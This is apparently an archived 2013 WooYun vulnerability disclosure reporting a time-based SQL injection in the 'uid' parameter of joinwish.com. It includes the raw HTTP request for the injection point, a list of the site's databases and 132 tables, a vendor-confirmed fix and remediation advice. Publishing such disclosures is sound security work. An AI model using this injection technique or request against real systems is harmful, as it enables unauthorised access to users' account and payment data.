乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-16: 细节已通知厂商并且等待厂商处理中 2013-08-19: 厂商已经确认,细节仅向厂商公开 2013-08-29: 细节向核心白帽子及相关领域专家公开 2013-09-08: 细节向普通白帽子公开 2013-09-18: 细节向实习白帽子公开 2013-09-30: 细节向公众公开
听说好愿网很爱发礼物,所以我就来了。
全站基本做了伪静态,但是仔细翻还是能翻到有动态参数的地方。注入点:
GET /wishservice/sponsors?uid=1&wid=10067221&sval=id HTTP/1.1Referer: http://www.joinwish.com/wish/show/id/10067221Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.joinwish.comCookie: PHPSESSID=1km4sivvelstuqmolpqjspjq62Accept-Encoding: gzip, deflate
注入参数uid,DBA权限,time based,读数据秒读。
还有很多其他地方也存在注射,参数不同,请都一并自查并修复。
有注射的地方以及参数。
数据库还是蛮多的。
over。
数据库:
available databases [9]:[*] huluwu[*] huluwu_dev[*] information_schema[*] joinwish_product[*] joinwish_verify[*] logs[*] mysql[*] performance_schema[*] test
当前数据库joinwish_product的数据表。
Database: joinwish_product[132 tables]+------------------------------+| account_freeze_tx || account_topups || account_transfers || account_tx || account_withdraws || accounts || alipay_transfer || alipay_transfer_batch || areas || auth_group || auth_group_permissions || auth_permission || auth_user || auth_user_groups || auth_user_user_permissions || backend_tx || backends || bank_cities || bank_provinces || barcode_types || biz_card_bindings || brands || c2c_topup_requests || card_items || cities || cs_logs || cs_roles || cs_user_functions || cs_user_role_functions || cs_user_roles || cs_users || django_admin_log || django_content_type || django_session || django_site || errors || exchanges_users || favorite_wishes || gateway_audit || gateway_audit_result || gateway_order || give_user_brand || hulu_card_no_libs || invitees || merchants || mptopup_orders || offline_transfers || p2p_catalogs || p2p_comment || p2p_commodities || p2p_exchange_0 || p2p_exchange_1 || p2p_merchant || p2p_order || p2p_send_transaction || p2p_send_withdraw || p2p_settlement_payment_batch || p2p_ticket || p2p_ticket_batch || payment_card_logs || payment_channels || payment_orders || properties || provinces || public_utility_orders || refunded_transactions || settlement || settlement_detail || shopping_items || shopping_orders || terminal_requests || transaction_details || transactions || tx_types || user_addresses || user_backends || user_friends || user_mp_verify_codes || user_reg_requests || user_saved_cards || user_sessions || user_uploaded_pic_catalogs || user_uploaded_pics || user_wish_statistics || users || weibo_template || wish_albums || wish_amount_increase_logs || wish_award_logs || wish_base || wish_cash_coupons || wish_comments || wish_commodities || wish_cs_roles || wish_cs_user_functions || wish_cs_user_role_functions || wish_cs_user_roles || wish_cs_users || wish_details || wish_exchange_items || wish_exchange_tocheck_users || wish_exchange_view || wish_exchanges || wish_fans || wish_gifts || wish_give_logs || wish_give_tx || wish_guest_infos || wish_hp_use_logs || wish_join_requests || wish_members || wish_mer_exchange || wish_merchants || wish_msgs || wish_pdts || wish_praise_statistical || wish_prop_logs || wish_pub_logs || wish_solutions || wish_themes || wish_transfers || wish_user_banding || wish_user_guides || wish_user_notification || wish_user_verification || wish_users || wish_visit_logs || wishes || withdraw_fee_rate || ym_sms || ym_sms_mo || ym_sms_mt |+------------------------------+
0x1:预编译,过滤,等等方式。0x2:数据库权限太高了。0x3:我是厚着脸皮要礼物的。
危害等级:中
漏洞Rank:10
确认时间:2013-08-19 14:44
已修复,今天统一发布
暂无